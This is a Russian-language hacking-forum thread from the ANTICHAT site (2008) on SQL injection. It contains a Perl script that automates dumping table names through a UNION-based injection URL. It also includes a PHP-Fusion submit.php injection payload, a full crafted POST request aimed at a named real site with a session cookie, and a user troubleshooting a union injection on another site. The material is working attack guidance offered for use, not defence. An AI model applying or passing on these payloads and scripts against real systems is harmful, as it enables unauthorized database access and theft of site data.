ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
11.05.2008, 15:30
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
если прав хватит
>select ColumnName from test2.TableName
|
|
|
11.05.2008, 18:23
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Сообщение от diznt
Как быстрее выявить таблицы? а то меняя значения лимита это занудно и долго
PHP код:
#!/usr/bin/perl
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
$x=0;
$y = $ARGV[0];
open(TT,">","mda.txt") or die "$!";
while ($x<=$y)
{
my $omfg = $ua->get("[СКУЛЬ ТУТ")->content;
$omfg =~m%###(.*?)###%i;
my $table = $1;
print TT $x,":",$table, "\n";
$x++;
}
close TT;
Сначало узнаёшь общее кол-во таблиц/колонок, count(table_name) from information_shema.tables/columns
Дальше в скрипт вписываешь скуль в таком виде:
http://site.ru/index.php?id=-1+union+select+1,2,3,concat(0x232323,table_name,0x 232323),4,5+from+information_schema.tables+limit+ $x,1--
Запуск:
perl script.pl 23
где 23 - общее кол-во таблиц/колонок. Скрипт впринципе можно переделать хоть подо что.
Многотредовую версию с поддержкой проксей не выкладываю, ибо нех:\
Последний раз редактировалось .Slip; 11.05.2008 в 23:34..
|
|
|
|
11.05.2008, 18:27
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
еще разок
http://forum.antichat.ru/thread60802.html
|
|
|
|
11.05.2008, 18:35
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283
Репутация:
69
|
|
Растолкуйте мне непонятливому кто нибудь как работает этот эксплоит. А то я что-то в нем запутался 
http://www.securitylab.ru/bitrix/exturl.php?goto=%2Fpoc%2Fextra%2F351739.php
а точнее какую ссылку он создает. Хотелось бы потренироваться вручную проводить такие иньекты. Да и на будующее пригодиться
пробовал на localhost-e но получил в отчетах бред
a:4:{s:13:"link_category";s:1:"1";s:9:"link_name"; s:1:"1";s:8:"link_url";s:1:"1";s:16:"link_descript ion";s:1:"1";}
|
|
|
|
11.05.2008, 18:40
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
там же все написано
Host: 127.0.0.1
POST PHP-Fusion/submit.php?stype=l
link_category=1 link_name=1 link_url=1 link_description=1 submit_info[paradox]=' submit_link=1
|
|
|
|
11.05.2008, 18:47
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283
Репутация:
69
|
|
я это видел. Но когда я пытался составить запрос вручную, меня кидало на главную стр. Приведи please рабочую ссылку, а я от нее буду отталкиваться дальше
|
|
|
|
11.05.2008, 19:40
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
samarin, это POST запрос submit.php запускается когда ты хочешь что-либо добавить на сайт (ссылку, картинку, новость, статью - это как правило доступно только зарегистрированным пользователям сайта). Допустим это ссылка, тогда ты видишь перед собой форму добавления новой ссылки, куда надо вписать категорию ссылки (link_category), имя (link_name), урл (link_url) и описание (link_description - здесь и есть скуля), после этого ты нажимаешь "Отправить ссылку" и браузер отправляет POST запрос, например на сайте 1С 1cnastole.info он будет выглядеть к примеру так:
Код:
POST /submit.php?stype=l HTTP/1.1
Host: 1cnastole.info
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://1cnastole.info/submit.php?stype=l
Cookie: fusion_visited=yes; fusion_user=211.b111406bc3sdfgs1cf532bfcc68d8d; fusion_lastvisit=1123123
Content-Type: application/x-www-form-urlencoded
Content-Length: 216
link_category=1%D1%3A%D4%F0%E0%ED%F7%E0%E9%E7%E8&link_name=%CD%E5%F2%EE&link_url=http%3A%2F%2Fqwer.ru&link_description=%F3%E4%E0%EB%E8%F2%E5+%EF%EB%E8%E7+%29&submit_link=%CE%F2%EF%F0%E0%E2%E8%F2%FC+%F1%F1%FB%EB%EA%F3
Результат увидишь когда ссылка добавится на сайт. (в эксплоите написано где именно). |
|
|
|
11.05.2008, 22:38
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283
Репутация:
69
|
|
Существуют ли какие-то плагины для создания(редактирования) пост запросов в опере?
-------------------------------------
и подкиньте полезные ссылки где можно почитать по работе с пост запросами
Последний раз редактировалось samarin; 11.05.2008 в 22:41..
|
|
|
|
11.05.2008, 22:51
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Связка InetCrack(для отправления запросов) + Naviscope(для отлова отправленных на любой сервер запросов). Но сначала внимательно прочитай про протокол HTTP.
|
|
|
|
12.05.2008, 01:35
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
Microsoft JET Database Engine error '80004005'
Syntax error in FROM clause.
http://www.../links/default.asp?id=1+union+select+1+from+user
В чем дело?
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
